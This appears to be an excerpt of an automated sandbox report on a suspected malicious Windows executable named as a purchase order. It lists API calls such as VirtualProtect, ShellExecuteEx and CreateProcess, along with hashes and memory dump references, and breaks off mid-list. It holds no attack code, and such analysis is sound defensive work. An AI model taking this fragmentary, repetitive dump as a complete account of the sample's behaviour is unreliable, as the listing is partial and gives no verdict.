Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 01db277db8653d624179d7b600e08ca7f67f5e45fdde97e81b8b39cbf95d4e5b
Instruction ID: 67493920040547a329b99de5d89bb6d269ebd8b6645208cc7e8d7a7b283b3978
Opcode Fuzzy Hash: 01db277db8653d624179d7b600e08ca7f67f5e45fdde97e81b8b39cbf95d4e5b
Instruction Fuzzy Hash: 09F0B431608125A7DF20BB765F5DE5F52A49B41378B20423BF212B21D1DABDC643856E

Function 00402758 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402776

Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: d0d9330acd65b2e867353bc74e86739eab35bf528f3ad37c96d6fee4195676f1
Instruction ID: 00adb5ebf99275c5c47ff66d1c826bee854e75ad94e87541b3f98b02de3c6d9f
Opcode Fuzzy Hash: d0d9330acd65b2e867353bc74e86739eab35bf528f3ad37c96d6fee4195676f1
Instruction Fuzzy Hash: E3E09272A04104AFDF50FBA4AE49DAF76B8EB40359B10043FF202F00C2CA7C4A538A2D

Function 004023C9 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402402

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
Instruction ID: f24de8215b53ecbcf80a61348f6bfc7870897c54b3e6c90e9d08f7162164e460
Opcode Fuzzy Hash: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
Instruction Fuzzy Hash: 9DE04F3160413A6BEB6036B11F8D97F2159AB84314B14053EBA11B62C6D9FC8E8352A9

Function 00406141 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402D0F,00000000,?,?), ref: 0040616A

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
Instruction ID: bbdc12591f07ec5b960d4a172b59ed2570ed34ba37628b65f55bcc9503456b15
Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
Instruction Fuzzy Hash: 7AE0E6B2020109BEEF099F60DC1AD7B772DE708310F01492EFA06D4151E6B5E9705634

Function 00405EC7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403343,00000000,0041D440,000000FF,0041D440,000000FF,000000FF,00000004,00000000), ref: 00405EDB

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
Instruction ID: 0d77a24040528495e1d5683a333844bda4a24a81b27895c3293bddb668a77566
Opcode Fuzzy Hash: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
Instruction Fuzzy Hash: 20E0EC3221065EABDF509F55DC00EEB7B6CEB05360F004837F965E2150D631EA219BE9

Function 00405E98 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040338D,00000000,00000000,004031B7,000000FF,00000004,00000000,00000000,00000000), ref: 00405EAC

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 62c77d97b5b576e4a72063145ecbe95ee4dab9ee0079c0f8f42f41321a19b9da
Instruction ID: c4f2c5db2c8838af9825f3b875f3a0ad88d5b51994199861a780369f0be58439
Opcode Fuzzy Hash: 62c77d97b5b576e4a72063145ecbe95ee4dab9ee0079c0f8f42f41321a19b9da
Instruction Fuzzy Hash: E4E04F32210619ABDF109F60DC04EAB3B6CEB00351F000432F954E2140D230E9118AE4

Function 6CA529B1 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(6CA5504C,00000004,00000040,6CA5503C), ref: 6CA529CF

Memory Dump Source

Source File: 00000005.00000002.1802235072457.000000006CA51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CA50000, based on PE: true

Associated: 00000005.00000002.1802235017861.000000006CA50000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1802235118767.000000006CA54000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1802235161633.000000006CA56000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca50000_Order 00293884800595.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 46c353ca108631c612ab927759d248f974a16ec98ed3a15f2af6d16d74fce79c
Instruction ID: 6f638060b087df5bccf5c3dee63622a99b6f1c6359052159931bbbbe566a4b0d
Opcode Fuzzy Hash: 46c353ca108631c612ab927759d248f974a16ec98ed3a15f2af6d16d74fce79c
Instruction Fuzzy Hash: 2FF0C9B0704382DECB68CF38D44470A3FF0BB1A364BD1C92AE14ED6641E33451968B91

Function 0040240D Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402440

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 2bf3f178d14cd4560723ce1317423526718b1f73ef5608a9eed72cfac383f117
Instruction ID: 16d05768d70be94792168112439c0a82a49a1a045ba9b991e9e4b5323ac17763
Opcode Fuzzy Hash: 2bf3f178d14cd4560723ce1317423526718b1f73ef5608a9eed72cfac383f117
Instruction Fuzzy Hash: 2CE04F3190821DBAEB007FA08F09AAD2A69AF01720F10002AFA507A0D1E6B98583971D

Function 00406113 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,004061A1,?,?,?,?,00000000,?), ref: 00406137

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction ID: 4278cf0171cf0b678593f71500b3925c4415a8e9ce87015ff7d519d2eb21bae6
Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction Fuzzy Hash: BCD0123204020DBBDF119E90AD01FAB3B1DEB48350F014826FE07A8091D775D570A724

Function 004015C2 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015CD

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: ad2c1245eb71982fcc6b079eee79e7d617a05ea2d30047a0a3aab57077eeae64
Instruction ID: 7d2cdf6a56bb8b2c4d8e447006d96498fe5724c9cded2cbb68f68f822827988b
Opcode Fuzzy Hash: ad2c1245eb71982fcc6b079eee79e7d617a05ea2d30047a0a3aab57077eeae64
Instruction Fuzzy Hash: BED01732708214DBDF60DBA8AF08A9FB3A4AB10328B20413BD211F21D1D6B9C5469B2D

Function 00404379 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00010448,00000000,00000000,00000000), ref: 0040438B

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a0eb0ef1ff6dd579934d65901b95a1f3a9c939147581cb3b9152e9d48dc718fa
Instruction ID: f513ac05e70e3adf76b651c0ca8ec4e95b66ff2fdc1b64d79a05bcbbe3c40a95
Opcode Fuzzy Hash: a0eb0ef1ff6dd579934d65901b95a1f3a9c939147581cb3b9152e9d48dc718fa
Instruction Fuzzy Hash: 4DC09BB17403027BFE209B529E45F077798D790700F1554397754F54D0C774D410D62C

Function 00404362 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: f6c8117e81de0903b802e48e7999fd2a70a6c35278de0d39013be8dd7138c214
Instruction ID: 50a7fc5ec129452a525cde7c4fd9a9aa290cced010421ab9f43a5acdc6dad314
Opcode Fuzzy Hash: f6c8117e81de0903b802e48e7999fd2a70a6c35278de0d39013be8dd7138c214
Instruction Fuzzy Hash: 33B0127A781601BBDE615B40DF09F457EB2E768701F408039B348240F0CEB200A9DB2C

Function 00405969 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ShellExecuteExA.SHELL32(?,00404774,?), ref: 00405978

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
Instruction ID: 923d99ad9cc7c2cd2e65252a1a37f78a8d30594c4c7a615bb4925eb6a4e84790
Opcode Fuzzy Hash: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
Instruction Fuzzy Hash: 27C092B2000200DFE301CF90CB08F067BF8AF54306F028068E184DA060C7788840CB29

Function 00403390 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,004030F6,?,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 0040339E

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
Instruction ID: 699dda5fb03a211c19396a68767747e6c986426da1756d7c47186a7ffa8d2f84
Opcode Fuzzy Hash: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
Instruction Fuzzy Hash: EBB01231140300BFDA214F00DF09F057B21AB94710F10C034B384780F086711075EB0E

Function 0040434F Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,0040412B), ref: 00404359

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Order 00293884800595.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: b7efc8905e9f2a5b3d5d2c2477723ee0501502072c4fff85560e1a7fdf79de64
Instruction ID: b84ed7fd3cc5f3c3e9fcd53eb4babc11f88d3e7fa425116ebe2a9639eb74f9e6
Opcode Fuzzy Hash: b7efc8905e9f2a5b3d5d2c2477723ee0501502072c4fff85560e1a7fdf79de64
Instruction Fuzzy Hash: 28A00176505500AFCA12AB50EF1980ABB66ABA4741B818479A685601358B768831EB1B

Function 00401FA0 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 004053D1: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00424440,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00424440,763F23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
Part of subcall function 004053D1: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,00000000,00424440,763F23A0), ref: 0040542D
Part of subcall function 004053D1: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll), ref: 0040543F
Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D

Part of subcall function 00405926: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042BC90,00431800,00431800,00431800,?,00431400,00000000), ref: 0040594F
Part of subcall function 00405926: CloseHandle.KERNEL32(?), ref: 0040595C

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FE5

Part of subcall function 0040672A: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040673B
Part of subcall function 0040672A: GetExitCodeProcess.KERNEL32(?,?), ref: 0040675D

Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8

Memory Dump Source

Source File: 00000005.00000002.1802214591803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1802214559836.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214622178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.1802214655586.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
